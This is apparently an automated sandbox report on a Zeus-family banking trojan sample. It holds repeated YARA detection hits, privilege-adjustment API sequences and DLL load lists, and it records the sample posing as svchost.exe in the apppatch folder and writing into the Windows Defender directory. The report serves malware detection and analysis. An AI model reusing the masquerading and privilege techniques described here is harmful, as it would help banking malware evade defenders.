Source: 00000002.00000003.2130882099.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145767072.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1318727770.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2110805717.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: Z8eHwAvqAh.exe PID: 7836, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 7908, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7448, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7352, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7232, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Z8eHwAvqAh.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.1.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@7/33@1112/23
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Code function: 1_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_00401E00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Code function: 22_2_01305930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,22_2_01305930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Code function: 25_2_015B5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,25_2_015B5930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Code function: 27_2_00B05930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,27_2_00B05930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Code function: 29_2_012C5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,29_2_012C5930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Code function: 31_2_01135930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,31_2_01135930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Code function: 33_2_01315930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,33_2_01315930
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Code function: 1_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,1_2_00401CF0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Code function: 1_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,1_2_00402680
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Program Files (x86)\Windows Defender\vonypom.com
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\login[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
Source: C:\Windows\apppatch\svchost.exe, Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7520
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Windows\apppatch\svchost.exe, Mutant created: \Sessions\1\BaseNamedObjects\9E2B3C2Da
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7544
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, File created: C:\Users\user\AppData\Local\Temp\14B3.tmp
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Z8eHwAvqAh.exe, ReversingLabs: Detection: 84%
Source: Z8eHwAvqAh.exe, String found in binary or memory: -help
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, File read: C:\Users\user\Desktop\Z8eHwAvqAh.exe
Source: unknown, Process created: C:\Users\user\Desktop\Z8eHwAvqAh.exe "C:\Users\user\Desktop\Z8eHwAvqAh.exe"
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 732
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 740
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 740
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: inetcomm.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: msoert2.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: inetres.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: vmhgfs.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: samcli.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: mpclient.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: version.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: firewallapi.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: fwbase.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe, Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: apphelp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: inetcomm.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: msoert2.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: oleacc.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: inetres.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: vmhgfs.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: netapi32.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: samcli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: netutils.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: sspicli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wldp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mpclient.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: version.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: profapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: firewallapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwbase.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winscard.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: devobj.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: sensapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dbghelp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wininet.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iertutil.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winhttp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mswsock.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winnsi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: urlmon.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: srvcli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: schannel.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mskeyprotect.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ntasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: msasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: gpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ncrypt.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ncryptsslp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: napinsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: pnrpnsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wshbth.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: nlaapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winrnr.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winsta.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dllJump to behavior
